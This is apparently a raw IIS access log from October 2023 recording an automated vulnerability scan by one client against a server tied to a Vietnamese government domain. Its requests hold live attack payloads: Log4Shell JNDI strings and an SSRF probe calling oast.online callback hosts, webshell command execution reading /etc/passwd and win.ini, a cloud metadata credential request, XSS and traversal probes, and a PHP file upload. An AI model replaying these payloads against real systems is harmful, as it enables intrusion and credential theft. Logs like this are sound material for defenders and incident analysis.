Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 200 2023-10-15 05:18:01 103.153.214.94 GET /liquibase - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 206 2023-10-15 05:18:03 103.153.214.94 GET /actuator/liquibase - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 201 2023-10-15 05:18:49 103.153.214.94 GET /logfile - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 200 2023-10-15 05:18:51 103.153.214.94 GET /actuator/logfile - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 201 2023-10-15 05:18:53 103.153.214.94 GET /actuators/logfile - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 200 2023-10-15 05:19:50 103.153.214.94 GET /loggers - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 206 2023-10-15 05:19:52 103.153.214.94 GET /actuator/loggers - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 204 2023-10-15 05:19:54 103.153.214.94 GET /mappings - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 199 2023-10-15 05:19:55 103.153.214.94 GET /actuator/mappings - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 200 2023-10-15 05:21:06 103.153.214.94 GET /metrics - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 206 2023-10-15 05:21:09 103.153.214.94 GET /actuator/metrics - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 209 2023-10-15 05:22:09 103.153.214.94 GET /threaddump - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 205 2023-10-15 05:22:12 103.153.214.94 GET /actuator/threaddump - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 203 2023-10-15 05:30:40 103.153.214.94 GET /trace - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 204 2023-10-15 05:31:02 103.153.214.94 POST /connect/register - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 204 2023-10-15 05:31:23 103.153.214.94 GET /Reports/Pages/Folder.aspx - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 206 2023-10-15 05:31:25 103.153.214.94 GET /ReportServer/Pages/Folder.aspx - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 201 2023-10-15 05:31:35 103.153.214.94 GET /struts/webconsole.html debug=console 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 200 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-10-15 05:47:59 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-10-15 05:47:59 103.153.214.94 GET /js/routing callback=fos.Router.setDatafoobarfoo 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 204 2023-10-15 05:49:13 103.153.214.94 GET /_fragment - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 206 2023-10-15 05:49:33 103.153.214.94 GET /tcpconfig.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201 2023-10-15 05:49:56 103.153.214.94 GET /guestLogin.html guest=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 203 2023-10-15 05:52:27 103.153.214.94 GET /registerUser.html init=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 205 2023-10-15 05:53:37 103.153.214.94 GET /examples/servlets/servlet/CookieExample - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 213 2023-10-15 05:53:42 103.153.214.94 GET /transmission/web/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 695 2023-10-15 05:55:13 103.153.214.94 GET /typo3/sysext/install/composer.json - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 210 2023-10-15 05:56:03 103.153.214.94 GET /home - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 203 2023-10-15 05:56:07 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 204 2023-10-15 05:56:09 103.153.214.94 GET /ui/clusters/kafka-ui/brokers - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 203 2023-10-15 05:56:39 103.153.214.94 GET /dashboard.aspx - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 201 2023-10-15 05:57:41 103.153.214.94 GET /overview.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 202 2023-10-15 06:05:32 103.153.214.94 GET /templates/config/profmanage.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 206 2023-10-15 06:06:16 103.153.214.94 GET /upgrade.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 208 2023-10-15 06:06:44 103.153.214.94 GET /wifi_base.shtml - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 207 2023-10-15 06:07:04 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 207 2023-10-15 06:07:11 103.153.214.94 GET /backend/admin/users username=anonymous 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 202 2023-10-15 06:07:23 103.153.214.94 GET /favicon.ico - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 4146 2023-10-15 06:07:25 103.153.214.94 GET /api/v1/namespaces/default/workflows query 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 0 2 216 2023-10-15 06:10:46 103.153.214.94 GET /Default.aspx - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 209 2023-10-15 06:11:49 103.153.214.94 GET /nacos/v1/auth/users pageNo=1&pageSize=9 443 - 193.123.37.162 Nacos-Server - 200 0 0 206 2023-10-15 06:11:51 103.153.214.94 GET /v1/auth/users pageNo=1&pageSize=9 443 - 193.123.37.162 Nacos-Server - 200 0 0 207 2023-10-15 06:12:11 103.153.214.94 GET /api/v1/data chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 0 2 221 2023-10-15 06:12:21 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 203 2023-10-15 06:12:23 103.153.214.94 GET /mongo-express/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 203 2023-10-15 06:12:25 103.153.214.94 GET /db/admin/system.users - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 203 2023-10-15 06:12:57 103.153.214.94 GET /dashboard.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 202 2023-10-15 06:13:50 103.153.214.94 GET /sensorlist.htm - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 209 2023-10-15 06:14:15 103.153.214.94 GET /data/plugins_listing - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 568 2023-10-15 06:14:19 103.153.214.94 PURGE / - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 201 2023-10-15 06:15:27 103.153.214.94 GET /config.json - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 202 2023-10-15 06:24:05 103.153.214.94 GET /audit/gui_detail_view.php token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 209 2023-10-15 06:25:02 103.153.214.94 GET /account/register - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 203 2023-10-15 06:25:45 103.153.214.94 GET /zabbix/zabbix.php action=dashboard.list 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 202 2023-10-15 06:26:09 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 208 2023-10-15 06:26:11 103.153.214.94 GET /stats/index.html - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 200 2023-10-15 06:29:10 103.153.214.94 GET /zenphoto/zp-core/setup/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 204 2023-10-15 06:29:12 103.153.214.94 GET /zp/zp-core/setup/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200 2023-10-15 06:29:14 103.153.214.94 GET /gallery/zp-core/setup/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 202 2023-10-15 06:29:16 103.153.214.94 GET /zp-core/setup/index.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 200 2023-10-15 06:30:15 103.153.214.94 GET /seeyon/personalBind.do.jpg/..;/ajax.do method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 206 2023-10-15 06:30:53 103.153.214.94 GET /dwr/index.html - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 203 2023-10-15 06:32:30 103.153.214.94 GET /js/elfinder.min.js - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 203 2023-10-15 06:32:32 103.153.214.94 GET /js/elFinder.version.js - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 200 2023-10-15 06:32:43 103.153.214.94 GET /.settings/rules.json auth=FIREBASE_SECRET 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 201 2023-10-15 06:33:01 103.153.214.94 POST /plus/weixin.php signature=da39a3ee5e6b4b0d3255bfef95601890afd80709×tamp&nonce 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 204 2023-10-15 06:33:15 103.153.214.94 POST /druid/indexer/v1/sampler for=connect 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 207 2023-10-15 06:34:10 103.153.214.94 GET /latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance - 443 - 193.123.37.162 - - 200 0 0 201 2023-10-15 06:34:38 103.153.214.94 POST /jars/upload - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 207 2023-10-15 06:43:11 103.153.214.94 GET /webtools/control/main - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 204 2023-10-15 06:44:22 103.153.214.94 GET /solr/admin/cores wt=json 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 204 2023-10-15 06:46:22 103.153.214.94 GET /solr/admin/collections action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-653%7D%24%7B%3A-128}%7D.%24%7BhostName%7D.uri.ckjv7uic8b6p3donsoogbys9jt8db4nqs.oast.online%2F%7D 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 205 2023-10-15 06:46:24 103.153.214.94 GET /solr/admin/cores action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-653%7D%24%7B%3A-128}%7D.%24%7BhostName%7D.uri.ckjv7uic8b6p3donsoogrcjz9zkbo3116.oast.online%2F%7D 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 201 2023-10-15 06:49:09 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 208 2023-10-15 06:49:19 103.153.214.94 POST /solr/gettingstarted_shard1_replica_n1/config - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 201 2023-10-15 06:49:21 103.153.214.94 POST /solr/gettingstarted_shard2_replica_n1/debug/dump param=ContentStreams 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 200 2023-10-15 06:49:51 103.153.214.94 PUT /PhoneBackup/2WfF0ZGXFOYEOZ7L4EcK0hfWFvE.php - 443 - 193.123.37.162 AVAYA - 405 0 1 201 2023-10-15 06:49:52 103.153.214.94 GET /PhoneBackup/2WfF0ZGXFOYEOZ7L4EcK0hfWFvE.php - 443 - 193.123.37.162 AVAYA - 200 0 0 200 2023-10-15 06:50:25 103.153.214.94 GET /admin/public/login.jsp error=%3Cscript%3Ealert(document.domain)%3C/script%3e 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 301 0 0 212 2023-10-15 06:50:27 103.153.214.94 GET /acs/..;/admin/public/login.jsp error=%3Cscript%3Ealert(document.domain)%3C/script%3e 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205 2023-10-15 06:51:42 103.153.214.94 GET /cgi-bin/nobody/Search.cgi action=scan 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 248 2023-10-15 06:52:08 103.153.214.94 GET /cgi-bin/user/Config.cgi .cab&action=get&category=Account.* 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 201 2023-10-15 06:52:11 103.153.214.94 GET /cgi-bin/user/Config.cgi /nobody&action=get&category=Account.* 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 635 2023-10-15 06:52:53 103.153.214.94 GET /cgi-bin/cgibox .cab 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 207 2023-10-15 06:52:53 103.153.214.94 GET /cgi-bin/cgibox /nobody 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 200 2023-10-15 06:54:02 103.153.214.94 GET /cgi-bin/nobody/VerifyCode.cgi account=YWRtaW46bGludXgzMjE=&login=quick 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 208 2023-10-15 07:03:27 103.153.214.94 GET /admin/index.php m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso&DESC=0 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 301 0 0 208 2023-10-15 07:07:13 103.153.214.94 POST /suite-auth/login - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 203 2023-10-15 07:07:15 103.153.214.94 POST /ccmadmin/j_security_check - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn/ccmadmin/showHome.do 405 0 1 201 2023-10-15 07:07:23 103.153.214.94 GET /jexws/jexws.jsp ppp=cat+%2Fetc%2Fpasswd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 201 2023-10-15 07:07:24 103.153.214.94 GET /jexws4/jexws4.jsp ppp=cat+%2Fetc%2Fpasswd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 201 2023-10-15 07:07:24 103.153.214.94 GET /jexinv4/jexinv4.jsp ppp=cat+%2Fetc%2Fpasswd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 204 2023-10-15 07:07:26 103.153.214.94 GET /jbossass/jbossass.jsp ppp=cat+%2Fetc%2Fpasswd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 200 2023-10-15 07:07:27 103.153.214.94 GET /jexws/jexws.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 211 2023-10-15 07:07:27 103.153.214.94 GET /jexws4/jexws4.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 200 2023-10-15 07:07:29 103.153.214.94 GET /jexinv4/jexinv4.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 200 2023-10-15 07:07:30 103.153.214.94 GET /jbossass/jbossass.jsp ppp=type+C%3A%2FWindows%2Fwin.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 204 2023-10-15 07:08:22 103.153.214.94 POST /j_security_check - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 202 2023-10-15 07:09:05 103.153.214.94 GET /cucm-uds/users - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 207 2023-10-15 07:09:25 103.153.214.94 GET /c42api/v3/LoginConfiguration username=${jndi:ldap://${:-141}${:-998}.${hostName}.username.ckjv7uic8b6p3donsoogysfc88emcsag6.oast.online/test}&url=https://localhost 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 201 2023-10-15 07:10:04 103.153.214.94 GET /ccm/system/panels/page/preview_as_user/preview cID="></iframe><svg/onload=alert("2WfF0XytoghJ92QQmSZP48fFfTL")> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 212 2023-10-15 07:12:02 103.153.214.94 GET /rest/sharelinks/1.0/link url=https://ckjv7uic8b6p3donsoogkfw44zmanqh71.oast.online/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 204 2023-10-15 07:13:01 103.153.214.94 GET /plus/carbuyaction.php dopost=return&code=../../ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 206 2023-10-15 07:18:53 103.153.214.94 GET /include/dialog/config.php adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 